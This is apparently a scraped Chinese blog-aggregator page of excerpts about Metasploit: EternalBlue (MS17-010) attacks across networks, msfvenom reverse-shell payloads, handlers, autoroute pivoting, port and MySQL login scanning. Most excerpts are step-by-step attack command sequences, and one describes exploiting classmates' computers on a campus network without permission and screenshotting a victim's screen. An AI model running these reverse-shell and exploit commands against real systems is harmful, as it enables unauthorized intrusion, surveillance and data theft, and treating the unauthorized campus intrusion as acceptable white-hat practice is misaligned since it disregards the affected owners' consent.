精华内容
下载资源
问答
  • 利用公网Msf+MS17010跨网段攻击内网

    千次阅读 2020-06-29 14:44:19
    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的...

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

    一、准备工作

    1.安装了Msf的公网主机+Ubuntu系统
    2.一台其他服务器内网存在445漏洞
    3.细心,细心,细心,钻研,钻研!!!

    二、反弹一个shell

    第一步:公网主机操作

    生成msf木马:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
    

    第二步:Msf监听端口:6666

    use exploit/multi/handler
    set PAYLOAD php/meterpreter/reverse_tcp
    set LHOST 111.111.111.111
    set LPORT 6666
    exploit
    

    添加路由

    run get_local_subnets (获取当前路由)
    run autoroute -s 192.168.3.0/24 (添加路由)
    run autorouute -d //删除添加的路由 (有需要才用)
    run autoroute -p (查看已添加路由)
    

    使用Payload进行攻击

    background(转换到后台)
    use scanner/portscan/tcp (先扫描开放445端口的PC)
    exploit(开始扫描)
    

    注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

    如何列出那些存在445漏洞的PC?

    使用MS17-010检测工具检测,github自行下载

    攻击正式开始

    use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
    set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
    exploit(执行攻击)
    

    攻击完成,并且会自动返回一个shell控制台

    展开全文
  • 使用msfconsole实现网段端口扫描

    千次阅读 2019-09-06 09:53:36
    msfconsole实现网段端口扫描 在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本 使用portscan模块进行局域网IP搜索 使用use命令进行syn扫描 然后我们可以使用showo ptions显示相关需要配置的信息 注:...

    msfconsole实现网段端口扫描

    在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本
    在这里插入图片描述

    使用portscan模块进行局域网IP搜索
    在这里插入图片描述

    使用use命令进行syn扫描
    在这里插入图片描述
    然后我们可以使用showo ptions显示相关需要配置的信息
    在这里插入图片描述

    注:在Required中显示no的才是我们需要设置的信息,其他yes的是可以不用设置的,当然,你看得懂设置也行
    下面进行set赋值
    在这里插入图片描述

    扫描结果
    在这里插入图片描述
    Ctrl+C键退出当前扫描

    关于退出命令
    Back:返回到msf界面
    Exit或者quit:退出msf

    步骤总结
    use auxiliary/scanner/portscan/tcp -->选择tcp的扫描方式
    set RHOSTS 192.168.2.107 -->设置扫描的目标IP
    set THREADS 10 -->设置扫描线程
    show options -->查看完整的设置是否正确齐全
    run -->开始运行,扫描

    喜欢的请支持一下
    在这里插入图片描述

    展开全文
  • 利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口。...使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。 首先确定要扫描的网...

    利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口。最近在搞MSF的深入学习,于是有了下文。

    ms17_010扫描工具

    msf中的辅助模块含有一个强大的ms17_010扫描工具:

     

    auxiliary/scanner/smb/smb_ms17_010

     

    使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。

    首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254 就可以了。

    具体的命令如下:

     

    use auxiliary/scanner/smb/smb_ms17_010
    set rhosts 10.31.0-128.1-254 set threads 512 exploit

    ms17_010扫描

    扫描的部分结果如下图所示:

    ms17_010 部分扫描结果

    上图中,左侧有绿色加号标记的主机并且被识别出来是Windows 7的主机有很大概率存在该漏洞。如果被识别出是Windows 8 或者 Windows 10的主机,基本上是不能成功的。当尝试完Windows 7 的后,如果还没有一台可以入侵的,可以继续尝试那些左侧是红色减号并且没有识别出系统版本的。

    好了,目标主机有了,下面就是开始入侵了!

    利用ms17_010入侵主机

    msf中的exploit模块中含有ms17_010的利用工具:

     

    exploit/windows/smb/ms17_010_eternalblue

    该工具的使用也很简单,只要设置好目标主要的ip和payload就可以exploit了。

     

    需要注意的是,在使用该exploit入侵主机时,如果一次不能成功,尽量不要尝试第二次了,这样很容易把目标主机搞崩溃。

    具体的命令如下:

    use exploit/windows/smb/ms17_010_eternalblue
    set rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 set lport 4567 exploit

    以上命令中的10.31.36.66为目标主机,监听反连的主机ip为10.31.30.49,也就是自己的主机ip,监听的端口为4567端口。

    不过上面那台主机并没有成功,下面是另外一台成功入侵的截图:

    成功入侵

    可以上面中的10.31.36.103 主机被成功入侵了:)。

    然后输入screenshot截个图看看主人在干什么吧。

    screenshot

    入侵计算机的屏幕截图

    好吧,在看LOL比赛 0.0 。

    我还是简单看看机子上有没动作片好下载,然后上传个txt提醒他修复漏洞好了。我们都是有操守的白帽子对吧:)。

    至此,利用MSF对ms17_010漏洞主机的发现和入侵过程就结束了,通过这些对校园网的扫描,发现还是有大部分主机是存在该漏洞的。。。

    展开全文
  • 使用MSF发现主机和端口扫描

    千次阅读 2018-12-16 00:05:00
    使用MSF发现主机和端口扫描 使用search命令查找需要的模块 MSF模块太多,记不住怎么办!!! 我们不需要记住所有模块,我们只要能找到我们想用的模块就行,平时积累使用的模块也行哦! 比如,我们通过扫描...

     

     

     使用MSF发现主机和端口扫描

     

     

    使用search命令查找需要的模块

     

    MSF模块太多,记不住怎么办!!!

    我们不需要记住所有模块,我们只要能找到我们想用的模块就行,平时积累使用的模块也行哦!

    比如,我们通过扫描发现目标开放ftp服务,我们想查找关于ftp服务的模块

    命令:

    search ftp

     

     更多使用方法!自己多去研究哦! 

     

     

     

     

    使用db_nmap

    命令和nmap用法一样,这里不做太多演示。

     

    使用db_nmap用于主机发现

    命令:

    db_nmap -sn 192.168.14.0/24

    db_nmap 192.168.14.0/24

     

     

     使用hosts查看扫描出来的主机

     

     

     

     

    使用Auxiliary 扫描模块

     

     主机发现(网段主机发现)

    auxiliary/scanner/discover/arp_sweep模块

     参数:

    INTERFACE(指定发包网卡 可选参数)、RHOSTS(目标)、SHOST(伪造IP 可选参数)、SMAC(伪造MAC地址 可选参数)、THREADS(线程数)

     

     

     

    端口发现

    auxiliary/scanner/portscan/syn模块

    参数:

    INTERFACE(可选参数)、PORTS(目标端口)、RHOSTS、THREADS(这里线程可以指定大一点,比如50)

     

     

     

    端口扫描模块
    auxiliary/scanner/portscan
    scanner/portscan/ack ACK防火墙扫描
    scanner/portscan/ftpbounce FTP跳端口扫描
    scanner/portscan/syn SYN端口扫描
    scanner/portscan/tcp TCP端口扫描
    scanner/portscan/xmas TCP"XMas"端口扫描

    转载于:https://www.cnblogs.com/-wenli/p/10125474.html

    展开全文
  • 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网...
  • 原理:在TCP/IP网络环境中,一台主机在发送数据帧前...因此,可以通过发送ARP请求的方式很容易地获取同一子网上的活跃主机情况,这种技术也称为ARP扫描。Metasploit的arp_sweep模块便是一个ARP扫描器。 第一步:在打
  • ##titile :msf 代理内网机器后,进行内网其他网段机器的渗透 首先利用反弹木马返回meterpreter shell 利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备 run get_local_subnets //获取路由地址 ...
  • 0x01简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致...1.先用nmap扫描整个网段开放的端口,再利用msf扫描模块儿,扫描开放了445端口的主机ip,扫描出存在ms17-010的...
  • MSF信息收集

    2020-07-08 22:21:23
    扫描 1.nmap扫描 例如: db_nmap -sV 192.168.1.0/24 //参数sv为全面扫描 2.Auxiliary 扫描模块 RHOSTS <> RHOST 192.168.1.20-192.168.1.30 //指定一个网段 192.168.1.0/24,192.168.11.0/24 //指定多个...
  • 浅谈MSF渗透测试

    2021-02-24 13:49:55
    是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务...
  • 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打...
  • 内网渗透之MSF 路由转发

    千次阅读 2017-11-22 11:24:22
    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。 MSF跳板实现过程: 需要获得一个msf的session会话; 获取内网地址网段; 在msf中添加”内网网段...
  • MSF的利用

    2020-04-18 15:53:37
    其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。 1.首先基于MSF的资产收集 网络主机收集: use auxiliary/...
  • msf辅助模块的应用

    2017-04-11 13:38:00
    因为其让设置的是RHOSTS,可以输入网段地址,即扫描网段内的所有主机。修改后再次运行 这里还有一个参数thread。应该是线程,我这部分学得不好,尝试了不同数值。若数值设置较小运行速度回较慢,数值较多同一结果...
  • win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描网段 判断目标主机二、通过Nessus 扫描该主机漏洞三、通过msf模块获取win7...
  • kaliMSF笔记

    2019-11-01 16:44:30
    几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行(系统命令等) 点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息 help / ? / help vulns MSF控制台命令 Banner、Color ...
  • 找出网段内活跃主机。 主机扫描方式: 1、传统 ICMP Ping 扫描 2、ACK Ping 扫描 3、SYN Ping 扫描 4、UDP Ping 扫描 主机扫描程序: ping Nmap ICMP Ping 对目标系统进行 echo request 请求探测,最常规的 Ping ...
  • MSF使用总结

    2020-09-25 23:23:05
    文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/...// 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
  • msf关于mysql模块的详细利用

    千次阅读 2019-01-14 09:31:48
    1.确定版本 auxiliary/scanner/mysql/mysql_version 某些ip...2.扫描弱口令 auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) &gt; set USERNAME root USERNAME =&gt; root msf auxilia...
  • msf代理进内网

    2021-07-12 19:12:08
    思路:拿到shell之后先获取最高权限,方法uac绕过提权 ...msf内网穿透进公网,cs传shell给msf 1.msf内网穿透进公网,cs传给msf shell linux: ./frpc -f *******85a82:1454793 windows:frpc_windows_amd64
  • Microsoft SQL安装后,默认监听TCP 1433端口,或使用随机的动态TCP端口。MSF中的mssql_ping模块可以完成。mssql_ping使用UDP协议,对大规模子网扫描时速度会很慢(处理超时的问题)。...设置网段和线程
  • 对某网段内的主机的指定端口进行扫描,并查看是否可以利用: 例如:对某一网段的smb445端口进行探测,利用的漏洞为 auxiliary/scanner/smb/smb_version 3.攻击利用:首先查看存活的主机的端口中是否存在弱口令...
  • 利用msf进行后渗透中常见的知识点

    万次阅读 2020-10-28 17:34:18
    然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用...
  • CFS初试-MSF

    2021-07-20 14:22:21
    # 网段查询 meterpreter > run get_local_subnets meterpreter > ipconfig # 添加路由 # 在全局给指定的session增删路由 route add 192.168.11.0 255.255.255.0 1 #在session1中添加到达192.168.11.0网段的...
  • Metasploit端口扫描

    2020-03-21 17:31:46
    Metasploit nmap 高级扫描(伪装 成空闲主机对目标探测:递增ip帧标识机制) 利用 Metasploit 中 auxiliary/scanner/ip/ipidseq模块扫描 ...使用nmap -sI 命令 开始扫描Msf 终端中使用nmap 先连接数据库 db_connect ...
  • msf 值 mysql 利用

    千次阅读 2013-12-05 01:58:02
    1.确定版本 auxiliary/scanner/mysql/mysql_version 某些ip设置了指定的...2.扫描弱口令 auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > set USERNAME root USERNAME => root msf auxili
  • cs和msf配合进行内网的操作

    千次阅读 2019-08-03 23:13:59
    cs中直接添加一个socks代理 msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测 setg Proxies socks4:xxx.xxx.xxx.xxx:44803

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,129
精华内容 451
关键字:

msf扫描网段